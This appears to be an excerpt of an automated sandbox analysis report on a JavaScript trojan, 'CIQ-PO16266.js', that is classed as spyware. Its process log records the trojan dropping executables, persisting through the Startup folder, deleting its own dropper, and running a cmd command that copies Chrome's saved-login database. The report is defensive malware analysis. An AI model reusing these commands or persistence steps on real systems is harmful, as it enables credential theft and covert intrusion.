Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010A8BE8 23_2_010A8BE8
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011023E3 23_2_011023E3
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107B236 23_2_0107B236
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0110FA2B 23_2_0110FA2B
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011232A9 23_2_011232A9
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011222AE 23_2_011222AE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111E2C5 23_2_0111E2C5
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01114AEF 23_2_01114AEF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01122D07 23_2_01122D07
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01050D20 23_2_01050D20
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01121D55 23_2_01121D55
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01072D50 23_2_01072D50
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01082581 23_2_01082581
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01112D82 23_2_01112D82
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010865A0 23_2_010865A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011225DD 23_2_011225DD
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0106D5E0 23_2_0106D5E0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0106841F 23_2_0106841F
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0107B477 23_2_0107B477
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111D466 23_2_0111D466
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01114496 23_2_01114496
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0112DFCE 23_2_0112DFCE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01121FF1 23_2_01121FF1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011167E2 23_2_011167E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0111D616 23_2_0111D616
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01075600 23_2_01075600
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01076E30 23_2_01076E30
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01101EB6 23_2_01101EB6
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01122EF7 23_2_01122EF7
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: String function: 010E5720 appears 53 times
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: String function: 010AD08C appears 42 times
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: String function: 0105B150 appears 154 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0435B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A320 NtCreateFile, 3_2_0002A320
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A3D0 NtReadFile, 3_2_0002A3D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A450 NtClose, 3_2_0002A450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A500 NtAllocateVirtualMemory, 3_2_0002A500
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A31A NtCreateFile, 3_2_0002A31A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A3CA NtReadFile, 3_2_0002A3CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A4FA NtAllocateVirtualMemory, 3_2_0002A4FA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00DE98F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9840 NtDelayExecution,LdrInitializeThunk, 3_2_00DE9840
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00DE9860
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE99A0 NtCreateSection,LdrInitializeThunk, 3_2_00DE99A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00DE9910
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A50 NtCreateFile,LdrInitializeThunk, 3_2_00DE9A50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00DE9A00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A20 NtResumeThread,LdrInitializeThunk, 3_2_00DE9A20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE95D0 NtClose,LdrInitializeThunk, 3_2_00DE95D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9540 NtReadFile,LdrInitializeThunk, 3_2_00DE9540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00DE96E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00DE9660
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00DE9FE0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00DE9780
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00DE97A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00DE9710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE98A0 NtWriteVirtualMemory, 3_2_00DE98A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DEB040 NtSuspendThread, 3_2_00DEB040
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9820 NtEnumerateKey, 3_2_00DE9820
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE99D0 NtCreateProcessEx, 3_2_00DE99D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9950 NtQueueApcThread, 3_2_00DE9950
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A80 NtOpenDirectoryObject, 3_2_00DE9A80
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A10 NtQuerySection, 3_2_00DE9A10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DEA3B0 NtGetContextThread, 3_2_00DEA3B0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9B00 NtSetValueKey, 3_2_00DE9B00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE95F0 NtQueryInformationFile, 3_2_00DE95F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399860 NtQuerySystemInformation,LdrInitializeThunk, 13_2_04399860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399840 NtDelayExecution,LdrInitializeThunk, 13_2_04399840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399910 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_04399910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399540 NtReadFile,LdrInitializeThunk, 13_2_04399540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043999A0 NtCreateSection,LdrInitializeThunk, 13_2_043999A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043995D0 NtClose,LdrInitializeThunk, 13_2_043995D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399610 NtEnumerateValueKey,LdrInitializeThunk, 13_2_04399610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399660 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_04399660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A50 NtCreateFile,LdrInitializeThunk, 13_2_04399A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399650 NtQueryValueKey,LdrInitializeThunk, 13_2_04399650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043996E0 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_043996E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043996D0 NtCreateKey,LdrInitializeThunk, 13_2_043996D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399710 NtQueryInformationToken,LdrInitializeThunk, 13_2_04399710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399B00 NtSetValueKey,LdrInitializeThunk, 13_2_04399B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399780 NtMapViewOfSection,LdrInitializeThunk, 13_2_04399780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399FE0 NtCreateMutant,LdrInitializeThunk, 13_2_04399FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399820 NtEnumerateKey, 13_2_04399820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439B040 NtSuspendThread, 13_2_0439B040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043998A0 NtWriteVirtualMemory, 13_2_043998A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043998F0 NtReadVirtualMemory, 13_2_043998F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439AD30 NtSetContextThread, 13_2_0439AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399520 NtWaitForSingleObject, 13_2_04399520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399560 NtWriteFile, 13_2_04399560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399950 NtQueueApcThread, 13_2_04399950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043995F0 NtQueryInformationFile, 13_2_043995F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043999D0 NtCreateProcessEx, 13_2_043999D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A20 NtResumeThread, 13_2_04399A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A10 NtQuerySection, 13_2_04399A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A00 NtProtectVirtualMemory, 13_2_04399A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399670 NtQueryInformationProcess, 13_2_04399670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A80 NtOpenDirectoryObject, 13_2_04399A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399730 NtQueryVirtualMemory, 13_2_04399730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439A710 NtOpenProcessToken, 13_2_0439A710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399770 NtSetInformationFile, 13_2_04399770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439A770 NtOpenThread, 13_2_0439A770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399760 NtOpenProcess, 13_2_04399760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0439A3B0 NtGetContextThread, 13_2_0439A3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043997A0 NtUnmapViewOfSection, 13_2_043997A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A320 NtCreateFile, 13_2_0041A320
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A3D0 NtReadFile, 13_2_0041A3D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A450 NtClose, 13_2_0041A450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A500 NtAllocateVirtualMemory, 13_2_0041A500
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A31A NtCreateFile, 13_2_0041A31A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A3CA NtReadFile, 13_2_0041A3CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041A4FA NtAllocateVirtualMemory, 13_2_0041A4FA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA3D0 NtReadFile, 23_2_008EA3D0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA320 NtCreateFile, 23_2_008EA320
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA450 NtClose, 23_2_008EA450
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA500 NtAllocateVirtualMemory, 23_2_008EA500
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA3CA NtReadFile, 23_2_008EA3CA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA31A NtCreateFile, 23_2_008EA31A
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EA4FA NtAllocateVirtualMemory, 23_2_008EA4FA
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_01099910
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_01099860
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010995D0 NtClose,LdrInitializeThunk, 23_2_010995D0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099FE0 NtCreateMutant,LdrInitializeThunk, 23_2_01099FE0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_01099660
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010996E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_010996E0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099950 NtQueueApcThread, 23_2_01099950
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010999A0 NtCreateSection, 23_2_010999A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010999D0 NtCreateProcessEx, 23_2_010999D0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099820 NtEnumerateKey, 23_2_01099820
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099840 NtDelayExecution, 23_2_01099840
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109B040 NtSuspendThread, 23_2_0109B040
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010998A0 NtWriteVirtualMemory, 23_2_010998A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010998F0 NtReadVirtualMemory, 23_2_010998F0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099B00 NtSetValueKey, 23_2_01099B00
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109A3B0 NtGetContextThread, 23_2_0109A3B0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A00 NtProtectVirtualMemory, 23_2_01099A00
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A10 NtQuerySection, 23_2_01099A10
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A20 NtResumeThread, 23_2_01099A20
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A50 NtCreateFile, 23_2_01099A50
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099A80 NtOpenDirectoryObject, 23_2_01099A80
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099520 NtWaitForSingleObject, 23_2_01099520
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109AD30 NtSetContextThread, 23_2_0109AD30
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099540 NtReadFile, 23_2_01099540
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099560 NtWriteFile, 23_2_01099560
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010995F0 NtQueryInformationFile, 23_2_010995F0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099710 NtQueryInformationToken, 23_2_01099710
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109A710 NtOpenProcessToken, 23_2_0109A710
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099730 NtQueryVirtualMemory, 23_2_01099730
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099760 NtOpenProcess, 23_2_01099760
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099770 NtSetInformationFile, 23_2_01099770
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0109A770 NtOpenThread, 23_2_0109A770
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099780 NtMapViewOfSection, 23_2_01099780
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010997A0 NtUnmapViewOfSection, 23_2_010997A0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099610 NtEnumerateValueKey, 23_2_01099610
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099650 NtQueryValueKey, 23_2_01099650
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01099670 NtQueryInformationProcess, 23_2_01099670
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010996D0 NtCreateKey, 23_2_010996D0
PE file does not import any functions
Source: oxx7nkdv4g8.exe.4.dr Static PE information: No import functions for PE file found
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: oxx7nkdv4g8.exe0.4.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: CIQ-PO16266.js Initial sample: Strings found which are bigger than 50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oxx7nkdv4g8.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oxx7nkdv4g8.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: oxx7nkdv4g8.exe.4.dr Static PE information: Section .text
Source: bin.exe.0.dr Static PE information: Section .text
Source: oxx7nkdv4g8.exe0.4.dr Static PE information: Section .text
Source: CIQ-PO16266.js Virustotal: Detection: 25%
Source: CIQ-PO16266.js ReversingLabs: Detection: 22%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO16266.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wtheeNaAZG.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wtheeNaAZG.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wtheeNaAZG.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\wtheeNaAZG.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@19/7@40/16
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Clf0t8l5h Jump to behavior
Source: explorer.exe, 00000004.00000000.478842715.000000000DF60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qBS;.VBp
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities Jump to behavior
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
